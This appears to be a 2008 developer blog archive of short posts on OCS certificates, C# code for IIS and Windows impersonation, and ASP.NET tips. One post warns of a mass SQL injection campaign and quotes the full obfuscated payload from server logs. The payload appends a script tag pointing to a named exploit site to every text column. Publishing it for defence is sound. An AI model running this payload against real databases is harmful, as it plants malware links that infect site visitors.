Thursday, October 23, 2008

OCS Conferencing Issues

You get the following messages when trying to conference people MS Communicator:

The process AVMCUSvc(5896) failed to send health notifications to the MCU factory at [URL]

The process DataMCUSvc(5840) failed to send health notifications to the MCU factory at [URL]

The process AcpMcuSvc(6112) failed to send health notifications to the MCU factory at [URL]

The process IMMcuSvc(5676) failed to send health notifications to the MCU factory at [URL]

A C3P request sent to an Mcu timed-out. Conferencing requests for this Mcu type will be retried but if this error continues to occur conferencing functionality will be affected.


Solution
http://forums.microsoft.com/unifiedcommunications/ShowPost.aspx?PageIndex=1&SiteID=57&PageID=1&PostID=1878497

Go to your certificate, I used IIS and right clicked my website and hit properties, went to "Directory Security" select View cert: You need to go to "details" tab and select "edit properties" Enable all purposes for this cert needs to be ticked.

This setting needs to be on all intermedia certs and parent certs, So after you verify your purchased cert has enabled all purposes go to the "certification path" tab and work your way up the tree selecting "view cert" and checking the details on each...

Wednesday, June 11, 2008

How to display almost all properties for all IIS Virtual Web Servers

Thanks to blog.crowe.co.nz/archive/2006/06/01/644.aspx:

using System;
using System.DirectoryServices;
namespace IISSample
{
static class Program
{
///
/// The main entry point for the application.
///
[STAThread]
static void Main()
{
const string WebServerSchema = "IIsWebServer"; // Case Sensitive
string ServerName = "LocalHost";
DirectoryEntry W3SVC = new DirectoryEntry("IIS://" + ServerName + "/w3svc");
foreach (DirectoryEntry Site in W3SVC.Children)
{
if (Site.SchemaClassName == WebServerSchema)
{
Console.WriteLine("WebSite Instance ID : " +Site.Name);
foreach (string PropertyName in Site.Properties.PropertyNames)
{
Console.WriteLine(PropertyName);
PropertyValueCollection pvc = Site.Properties[PropertyName];
foreach(object Value in pvc)
Console.WriteLine(" " + Value.ToString());
}
}
Console.WriteLine("".PadRight(80, '-'));
}
}
}
}

Tuesday, June 10, 2008

Impersonating a user programmatically in C# code

The credit for this code goes to http://justgeeks.blogspot.com/2007/09/impersonating-user-programmatically-in_06.html
Here is how to call it....

public void SampleCallingMethod(Object s, EventArgs e)
{
if(ImpersonateUser("username", "domain", "password"))
{
//Insert your code that runs under the security context of a specific user here.
doSomethingHere();
UnImpersonation();
}
else
{
//Your impersonation failed. Therefore, include a fail-safe mechanism here.
}
}

Here is the source code....


using System;
using System.Web;
using System.Web.Security;
using System.Security.Principal;
using System.Runtime.InteropServices;

namespace AuthenticationMapper
{
///
/// Use this class to run a section of code as a different user.
/// Most of this code was copied from: http://support.microsoft.com/kb/306158
/// Modifications by: Brent Vermilion 9/5/2007
///
public class Impersonation
{

WindowsImpersonationContext impersonationContext;

#region WIN32 definitions


public const int LOGON32_LOGON_INTERACTIVE = 2;
public const int LOGON32_PROVIDER_DEFAULT = 0;

[DllImport("advapi32.dll")]
public static extern int LogonUserA(String lpszUserName,
String lpszDomain,
String lpszPassword,
int dwLogonType,
int dwLogonProvider,
ref IntPtr phToken);
[DllImport("advapi32.dll", CharSet=CharSet.Auto, SetLastError=true)]
public static extern int DuplicateToken(IntPtr hToken,
int impersonationLevel,
ref IntPtr hNewToken);

[DllImport("advapi32.dll", CharSet=CharSet.Auto, SetLastError=true)]
public static extern bool RevertToSelf();

[DllImport("kernel32.dll", CharSet=CharSet.Auto)]
public static extern bool CloseHandle(IntPtr handle);

#endregion

public Impersonation()
{

}
#region SampleUsage
public void SampleCallingMethod(Object s, EventArgs e)
{
if(ImpersonateUser("username", "domain", "password"))
{
//Insert your code that runs under the security context of a specific user here.
UnImpersonation();
}
else
{
//Your impersonation failed. Therefore, include a fail-safe mechanism here.
}
}

#endregion

public bool ImpersonateUser(String userName, String domain, String password)
{
WindowsIdentity tempWindowsIdentity;
IntPtr token = IntPtr.Zero;
IntPtr tokenDuplicate = IntPtr.Zero;

if(RevertToSelf())
{
if(LogonUserA(userName, domain, password, LOGON32_LOGON_INTERACTIVE,
LOGON32_PROVIDER_DEFAULT, ref token) != 0)
{
if(DuplicateToken(token, 2, ref tokenDuplicate) != 0)
{
tempWindowsIdentity = new WindowsIdentity(tokenDuplicate);
impersonationContext = tempWindowsIdentity.Impersonate();
if (impersonationContext != null)
{
CloseHandle(token);
CloseHandle(tokenDuplicate);
return true;
}
}
}
}
if(token!= IntPtr.Zero)
CloseHandle(token);
if(tokenDuplicate!=IntPtr.Zero)
CloseHandle(tokenDuplicate);
return false;
}

public void UnImpersonation()
{
impersonationContext.Undo();
}

}
}

Tuesday, June 3, 2008

Programmatically add an IP address to IIS Blocked IP List

Thanks to http://netcode.ru/dotnet/?lang=&katID=30&skatID=275&artID=7590.

using System;
using System.IO;
using System.Collections;
using System.DirectoryServices;
using System.Reflection;


namespace soccerwrek
{
class IISWMI
{

[STAThread]
static void Main(string[] args)
{
try
{
// retrieve the directory entry for the root of the IIS server

System.DirectoryServices.DirectoryEntry IIS =
new System.DirectoryServices.DirectoryEntry(
"IIS://localhost/w3svc/1/root");

// retrieve the list of currently denied IPs

Console.WriteLine(
"Retrieving the list of currently denied IPs.");

// get the IPSecurity property

Type typ = IIS.Properties["IPSecurity"][0].GetType();
object IPSecurity = IIS.Properties["IPSecurity"][0];

// retrieve the IPDeny list from the IPSecurity object
Array origIPDenyList = (Array) typ.InvokeMember("IPDeny",
BindingFlags.DeclaredOnly |
BindingFlags.Public | BindingFlags.NonPublic |
BindingFlags.Instance | BindingFlags.GetProperty,
null, IPSecurity, null);

// display what was being denied
foreach(string s in origIPDenyList)
Console.WriteLine("Before: " + s);

// check GrantByDefault. This has to be set to true,
// or what we are doing will not work.
bool bGrantByDefault = (bool) typ.InvokeMember("GrantByDefault",
BindingFlags.DeclaredOnly |
BindingFlags.Public | BindingFlags.NonPublic |
BindingFlags.Instance | BindingFlags.GetProperty,
null, IPSecurity, null);

Console.WriteLine("GrantByDefault = " + bGrantByDefault);
if(!bGrantByDefault)
{
typ.InvokeMember("GrantByDefault",
BindingFlags.DeclaredOnly |
BindingFlags.Public | BindingFlags.NonPublic |
BindingFlags.Instance | BindingFlags.SetProperty,
null, IPSecurity, new object[] {true});
}

// update the list of denied IPs. This is a
// complete replace. If you want to maintain what
// was already being denied, you need to make sure
// those IPs are in here as well. This area
// will be where you will most likely modify to
// your needs as this is just an example.
Console.WriteLine("Updating the list of denied IPs.");
object[] newIPDenyList = new object[4];
newIPDenyList[0] = "192.168.1.1, 255.255.255.255";
newIPDenyList[1] = "192.168.1.2, 255.255.255.255";
newIPDenyList[2] = "192.168.1.3, 255.255.255.255";
newIPDenyList[3] = "192.168.1.4, 255.255.255.255";
Console.WriteLine("Calling SetProperty");

// add the updated list back to the IPSecurity object
typ.InvokeMember("IPDeny",
BindingFlags.DeclaredOnly |
BindingFlags.Public | BindingFlags.NonPublic |
BindingFlags.Instance | BindingFlags.SetProperty,
null, IPSecurity, new object[] {newIPDenyList});

IIS.Properties["IPSecurity"][0] = IPSecurity;
Console.WriteLine("Commiting the changes.");

// commit the changes
IIS.CommitChanges();
IIS.RefreshCache();

// check to see if the update took
Console.WriteLine("Checking to see if the update took.");
IPSecurity = IIS.Properties["IPSecurity"][0];
Array y = (Array) typ.InvokeMember("IPDeny",
BindingFlags.DeclaredOnly |
BindingFlags.Public | BindingFlags.NonPublic |
BindingFlags.Instance | BindingFlags.GetProperty,
null, IPSecurity, null);
foreach(string s in y)
Console.WriteLine("After: " + s);
}
catch (Exception e)
{
Console.WriteLine("Error: " + e.ToString());
}
}
}
}

ASP.NET - Disable the Submit Button on Form Submit Event

URL: http://www.codeproject.com/KB/aspnet/DisableSubmitButton.aspx

Button1.Attributes.Add("onclick","javascript:" +
Button1.ClientID + ".disabled=true;" +
this.GetPostBackEventReference(Button1));

Monday, June 2, 2008

Regular expression to evaluate text for SQL statements

http://www.experts-exchange.com/Programming/Languages/C_Sharp/Q_21946011.html

string sql = ReadTextFromFile("class.cs");

Match m = Regex.Match(sql,
@"([Ss][Ee][Ll][Ee][Cc][Tt].+[Ff][Rr][Oo][Mm] +.+ +([Ww][Hh][Ee][Rr][Ee])?.+;)|([Dd][Ee][Ll][Ee][Tt][Ee](.+[Ff][Rr][Oo][Mm])? +.+;)|([Ii][Nn][Ss][Ee][Rr][Tt](.+[Ii][Nn][Tt][Oo])? +.+;)|([Uu][Pp][Dd][Aa][Tt][Ee] +.+ +[Ww][Hh][Ee][Rr][Ee].+;)");

Saturday, May 31, 2008

ASP.NET HttpModule and Session Variables

If you want to use session variables in HttpModule, you have to write your code in PreRequestHandlerExecute event. In addition, your class should also inherit IRequiresSessionState interface. If you write your code in BeginRequest event, and try to get or set a session variable, you will get System.NullReferenceException exception. More information can be found at http://forums.asp.net/p/1098574/1665773.aspx.

Latest from Mass SQL Injection Attack - Text and VarChar fields got appended with http://www.xiaobaishan.net/dt/Help.asp

***DO NOT GO TO THE ABOVE URL**
This is latest from the SQL injection attack from the past few months. I didn't found out details about this web site but the database is infected. The web site apparently try to exploit vulnerabilty in Real Player and Media player. Please scan your databases.

The web site log shows the following SQL statement. I will post script to reverse the attack as soon as possible:

dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F7777772E7869616F6261697368616E2E6E65742F64742F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;

Thursday, May 29, 2008

Google Search Appliances - Referencing External JavaScript

Integrating an external JavaScript for e.g.; Search Highlighter(http://code.google.com/p/javascript-search-term-highlighter/) in Google Search Appliances front-end XSLT can be a little pain. The XSLT will deliver the external javascript declaration as an XHTML compliant output <script type="text/javasript" src="http://www.website.com/external.js" /> and the resultant search page will be blank. To resolve this, simply add a comment between the
script declaration:

<script type="text/javasript" src="http://www.website.com/external.js">
//Comment
</script>